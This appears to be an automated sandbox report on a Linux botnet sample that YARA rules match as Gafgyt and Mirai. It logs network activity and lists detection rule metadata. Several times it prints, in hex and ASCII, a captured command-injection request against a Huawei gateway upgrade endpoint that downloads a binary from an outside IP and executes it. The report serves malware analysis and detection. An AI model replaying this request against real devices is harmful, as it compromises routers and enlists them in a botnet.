3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 157.69.213.161
          Source: unknownTCP traffic detected without corresponding DNS query: 54.181.112.161
          Source: unknownTCP traffic detected without corresponding DNS query: 41.201.50.243
          Source: unknownTCP traffic detected without corresponding DNS query: 197.46.216.52
          Source: unknownTCP traffic detected without corresponding DNS query: 157.181.232.137
          Source: unknownTCP traffic detected without corresponding DNS query: 157.121.7.109
          Source: unknownTCP traffic detected without corresponding DNS query: 157.160.5.161
          Source: unknownTCP traffic detected without corresponding DNS query: 197.108.7.32
          Source: unknownTCP traffic detected without corresponding DNS query: 157.247.82.49
          Source: unknownTCP traffic detected without corresponding DNS query: 157.62.100.69
          Source: unknownTCP traffic detected without corresponding DNS query: 41.253.49.219
          Source: unknownTCP traffic detected without corresponding DNS query: 41.138.145.46
          Source: unknownTCP traffic detected without corresponding DNS query: 157.153.27.61
          Source: unknownTCP traffic detected without corresponding DNS query: 157.60.185.218
          Source: unknownTCP traffic detected without corresponding DNS query: 197.25.151.92
          Source: unknownTCP traffic detected without corresponding DNS query: 157.50.115.70
          Source: unknownTCP traffic detected without corresponding DNS query: 41.119.64.157
          Source: unknownTCP traffic detected without corresponding DNS query: 197.93.178.172
          Source: unknownTCP traffic detected without corresponding DNS query: 216.156.238.190
          Source: unknownTCP traffic detected without corresponding DNS query: 41.22.72.94
          Source: unknownTCP traffic detected without corresponding DNS query: 34.139.69.212
          Source: unknownTCP traffic detected without corresponding DNS query: 41.195.197.253
          Source: unknownTCP traffic detected without corresponding DNS query: 157.254.83.178
          Source: unknownTCP traffic detected without corresponding DNS query: 41.41.105.186
          Source: unknownTCP traffic detected without corresponding DNS query: 157.48.0.216
          Source: unknownTCP traffic detected without corresponding DNS query: 197.111.249.62
          Source: unknownTCP traffic detected without corresponding DNS query: 131.169.35.127
          Source: unknownTCP traffic detected without corresponding DNS query: 157.168.121.177
          Source: unknownTCP traffic detected without corresponding DNS query: 217.92.220.21
          Source: unknownTCP traffic detected without corresponding DNS query: 197.3.31.105
          Source: unknownTCP traffic detected without corresponding DNS query: 190.211.76.230
          Source: unknownTCP traffic detected without corresponding DNS query: 157.66.89.253
          Source: unknownTCP traffic detected without corresponding DNS query: 41.251.233.54
          Source: unknownTCP traffic detected without corresponding DNS query: 41.21.179.143
          Source: unknownTCP traffic detected without corresponding DNS query: 168.152.147.127
          Source: unknownTCP traffic detected without corresponding DNS query: 157.184.179.188
          Source: unknownTCP traffic detected without corresponding DNS query: 157.172.95.48
          Source: unknownTCP traffic detected without corresponding DNS query: 41.186.24.153
          Source: unknownTCP traffic detected without corresponding DNS query: 157.4.239.11
          Source: unknownTCP traffic detected without corresponding DNS query: 166.21.183.195
          Source: unknownTCP traffic detected without corresponding DNS query: 157.172.226.221
          Source: unknownTCP traffic detected without corresponding DNS query: 157.240.136.76
          Source: unknownTCP traffic detected without corresponding DNS query: 98.118.100.238
          Source: unknownTCP traffic detected without corresponding DNS query: 41.52.39.198
          Source: unknownTCP traffic detected without corresponding DNS query: 41.86.147.69
          Source: unknownTCP traffic detected without corresponding DNS query: 41.172.201.183
          Source: unknownTCP traffic detected without corresponding DNS query: 158.179.115.74
          Source: unknownTCP traffic detected without corresponding DNS query: 95.216.203.108
          Source: x86_64.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86_64.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: queries for: test.zxyes.xyz

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Process Memory Space: x86_64.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
